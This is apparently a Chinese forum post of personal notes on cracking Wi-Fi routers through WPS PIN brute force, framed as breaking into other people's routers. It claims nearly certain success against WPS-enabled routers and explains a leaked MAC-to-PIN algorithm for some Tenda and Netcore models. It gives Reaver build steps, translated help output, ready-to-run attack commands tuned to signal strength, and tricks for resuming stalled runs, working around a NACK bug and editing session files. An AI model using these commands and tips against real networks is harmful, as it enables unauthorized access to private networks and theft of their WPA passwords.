|
都是自己学习PIN时的一些东西,希望对大家有点帮助 无线破解现状 1、老路由没有pin功能,并且设置wpa15位以上长密码的。 缺点:这类路由破解需要抓包跑字典,基本无解; 2、WEP加密的新旧款无线路由基本百分百能解出密码。 缺点:WEP越来越少 3、近两年新款无线支持pin码的路由,基本百分百能破解密码和pin码。 优点:WPA、WPA2被授予无法破解的神话,这个神话终于被pin破解打破,基本上这两年的新款路由都支持pin功能 无线路由pin码一共11000组数字组成前四位是0000~9999,后三位是000~999,最后以为是0~9.这样就可以肯定不管对方路由设置的是什么密码,都逃不过这11000组数字。只要他支持pin功能我们就可以百分百的破解出对方路由的pin码和设置的wpa密码(密码以明文方式显示) 缺点:这种破解只能针对近两年的新路由,就是软件搜到后面显示wps名称的路由。老路由不支持pin功能只有继续使用原始方式破解。并且pin的过程中容易出现把对方路由端口堵死(堵死后必须等待对方重启路由才能继续完成破解) 破解时间较长几分钟~几小时 关于WPS From: http://baike.baidu.com/view/4543635.htm WPS是一项非专有的规范,它是由Wi-Fi联盟实施的认证项目。 WPS是Wi-Fi认证产品的可选认证项目。 并非所有的Wi-Fi认证产品都支持WPS,用户可在产品上寻找Wi-Fi Protected Setup 的标志,以确保所购产品已具备 Wi-Fi Protected Setup功能。已通过Wi-Fi Protected Setup 的产品目前能够为用户提供两种安装解决方案: 输入PIN码――对于WPS认证的设备为强制配置。 按钮配置(PBC)――它可以是设备上的硬件按钮或软件模拟的按钮(对于无线客户端为可选配置)。在PIN配置模式中,系统在接入点或无线路由器中设置注册表,用户通过在注册表中输入客户端PIN码为网络中新增设备分配证书(注意:在PBC模式中,当客户端PIN码为全0时,系统也需要设置注册表)。 WPS并没有新增安全性能――它使得现有的安全技术更容易配置。 PIN计算新突破:部分无线路由可直接由MAC计算出默认PIN 近日,腾达部分以MAC为“C83A35”,“00B00C”打头的,包含腾达W150M在内的产品以及 磊科NW705P, 磊科NW705S, 磊科NW705+, 磊科NW714, 磊科NW702, 磊科NW712, 磊科NW709 等产品相继泄露出PIN算法。 如果您的路由MAC前6位是C83A35或者00B00C,输入后六位MAC,您可以直接获取到PIN密钥 其PIN算法十分简陋,只需要将相应前6位MAC开头的产品的后6位16进制MAC转化成10进制数,即可得到一个7位数字。众所周知的是,PIN由8位构成,其前7位为随机,而第八位为校验位,可通过前七位计算得来。从而直接由MAC获取出PIN,并通过Reaver获取其WPA PSK密钥,从而快速破解路由。 根据IEEE标准数据库信息,C83A35和00B00C均属于腾达科技旗下的OUI地址,此次受影响的路由包括但不限于腾达W150M等腾达型号的,具备QSS/WPS连接功能的路由。 WiFiBETA预测,磊科官方全线产品均采用这种简单的,不安全的,非随机的PIN生成方案。其官方网站声明提到,受影响的产品为本文文初所罗列,其相关升级软件(初步估计为固件或PIN重烧录工具)正在开发中。而腾达中有部分产品,其OUI为C83A35,00B00C,081075等的路由均亦采用此类算法。值得一提的是,腾达官方并未做出任何证明回应。 关于Reaver reaver-wps Brute force attack against Wifi Protected Setup Homepage: http://code.google.com/p/reaver-wps/ On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. douglas@pentest:~/pentest/wireless/reaver-1.4/src$ ./configure checking for gcc... gcc checking whether the C compiler works... yes checking for C compiler default output file name... a.out checking for suffix of executables... checking whether we are cross compiling... no checking for suffix of object files... o checking whether we are using the GNU C compiler... yes checking whether gcc accepts -g... yes checking for gcc option to accept ISO C89... none needed checking for pcap_open_live in -lpcap... no error: pcap library not found! sudo apt-get install libpcap0.8-dev xxxxxx@pentest:~/pentest/wireless/reaver-1.4/src$ ./reaver Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <http://forum./mailto:cheffner@tacnetsol.com> Required Arguments: 必选参数 -i, --interface=<wlan> Name of the monitor-mode interface to use 使用到的监控模式的接口的名字 -b, --bssid=<mac> BSSID of the target AP 目标AP的BSSID Optional Arguments: 可选参数 -m, --mac=<mac> MAC of the host system 主机系统的MAD地址 -e, --essid=<ssid> ESSID of the target AP 目标AP的ESSID -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) 设置802.11 频道的接口 意味着-f -o, --out-file=<file> Send output to a log file [stdout] 发送输出到一个log文件(标准输出) -s, --session=<file> Restore a previous session file 恢复以前的会话文件 -C, --exec=<command> Execute the supplied command upon successful pin recovery 在pin成功回复后执行如下命令 -D, --daemonize Daemonize reaver 守护进程 -a, --auto Auto detect the best advanced options for the target AP 自动检测目标AP最好的高级选项 -f, --fixed Disable channel hopping 禁用频道跳频 -5, --5ghz Use 5GHz 802.11 channels 使用5GHz 802.11 频道 -v, --verbose Display non-critical warnings (-vv for more) 显示非严重警告(vv更多) verbose 详细 -q, --quiet Only display critical messages 安静 仅显示关键消息 -h, --help Show help 显示帮助 Advanced Options: 高级选项 -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin 使用指定的4个或8个数字WPS pin -d, --delay=<seconds> Set the delay between pin attempts [1] 设置延迟之后的尝试 -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60] 设置时间等待,如果AP锁定WPS pin尝试 -g, --max-attempts=<num> Quit after num pin attempts 数字pin尝试后退出 -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0] 设置睡眠时间在10次意外失败之后 -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts 睡眠Y秒后尝试x pin -t, --timeout=<seconds> Set the receive timeout period [5] 设置超时周期 -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] 设置M5/M7超时周期 -A, --no-associate Do not associate with the AP (association must be done by another application) 不关联到AP 使用另外的程序关联 -N, --no-nacks Do not send NACK messages when out of order packets are received 当乱序数据包被接收时,不发送NACK消息 -S, --dh-small Use small DH keys to improve crack speed 使用小DH密钥来提高破解速度 -L, --ignore-locks Ignore locked state reported by the target AP 忽略报告为锁定状态的AP -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet 使用一个EAP FAIL包来终止灭个WPS会话 -n, --nack Target AP always sends a NACK [Auto] 总是发送一个NACK到目标AP -w, --win7 Mimic a Windows 7 registrar [False] 模仿Windows 7 登记 Example: 例如 ./reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv Reaver的一些技巧 使用PIN方法破解WPA-PSK密码有一个限制,就是AP必须开启了QSS、WPS功能! 使用airodump-ng扫描时候在MB栏中54e后面有点(.)的是开了wps。但是这个要多试几次才准。可以先用Qss软件测试一下 或者在win7下面,连接AP时候在密码输入框下面有“通过按路由器按钮也可以连接”字样也是开启了QSS、wps的。 关于信号 PIN破密对信号要求极为严格,如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或 timeout)。AP关闭了WPS、或者没有QSS滴,会出现 WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX) PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次) 目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1 目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1 目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1 关于死循环 当出现的时候 [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request 按Ctrl +C 停止,然后使用 reaver -i mon0 -b mac地址 -a -S -vv -s /root/e234567890bc.wpc 继续跑 当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。 如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)会从指定PIN段起破密。 如果进度到99.9%后,AP死机,可打开它,总共1000个3位数,找出剩余的十几个PIN码,用QSS、WPS客户端软件,手动测试、破密。 如果是跑了99.99%死机, 意味吗? 你懂的吧? 最后一个PIN就是。 指定PIN码,获得WPA 密码PSK reaver -i mon0 -b MAC -p 8位数PIN值 如果上述措施不后,仍不见PSK密码,可能因软件原因,漏码了!重新跑后三位数 [+] Trying pin 02835679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK =================== 正常情况下在M4后,会收到WSC NACK包。这是就知道当前的0283是错误的。然后开始试下一个pin. 缺省情况下,如果在M4后没有收到任何包,等待超时后,也会认为当前的pin是错误的,然后开始试下一个pin. 如果是因为丢包的原因,没有收到M5包,显然正确的pin就会当作错误的pin.因此就会出现99.99%的问题。 解决办法: 加上-n 参数 reaver -vvnS -d 0 -b xxxx 注意:reaver 会为每个AP创建一个pin序列文件,这个文件存放在 /etc/reaver/ 或/usr/local/etc/reaver, 根据reaver的帮助,reaver缺省情况下会自动检查AP是否回应NACK.因此不需要加-n参数才对。 我看了一下代码,这确实是一个bug. 但是通过加-n参数,可以绕过这个bug. 死循环 当你看到PIN到一定程度,窗口里的PIN码不变、进度百分比也不走,那么恭喜你碰到死循环了。 保持原窗口不变,再打开一个shell,然后执行 reaver -i mon0 -b 正在PIN的MAC -a -s -vv 一般人执行的命令都是MAC 后跟的后缀都是 -vv -a -S,然而,殊不知,这样的后缀虽然可以加快速度,但是,也有可能会错过正确前四位的确认。所以,不放过每一次确认信息的命令是 reaver -i mon0 -b MAC -v -a -n 还可以加一个 -c wpc文件结构 将mac地址.wpc 备份,下次可以继续使用。 wpc结构 0 //这个地方是说它的前4位PIN码的进度位置数 0 //这个地方是说后3位PIN数的已经运行测试位置数 0 //0时没有找到,当为1时找到前四位,当为2时全部找到。 1234 0123 1111 2222 3333 ....... ....... 9999 001 002 003 ..... ..... 999 所以前四位很重要,将已经知道的前四们放在最前面会提高你的PIN速度,我们也可以手动修改wpc文件第一行,如我们要从3000开始pin你可以将它修改为3004,这样它就会从3000开始PIN了。当我们在PIN时就可以不用保存虚拟机快照了,只要你记住了前四位,你下载用软件修改WPC文件就可了。cdlinux对wpc文件最方便,beini和xiaopan对wpc修改要用命令vi来修改,vi的使用方法很简单vi XXXX.wpc 打开就可以了,输入i进行编辑,escap退回命令模式,输入:wq退出保存。 |
|
|
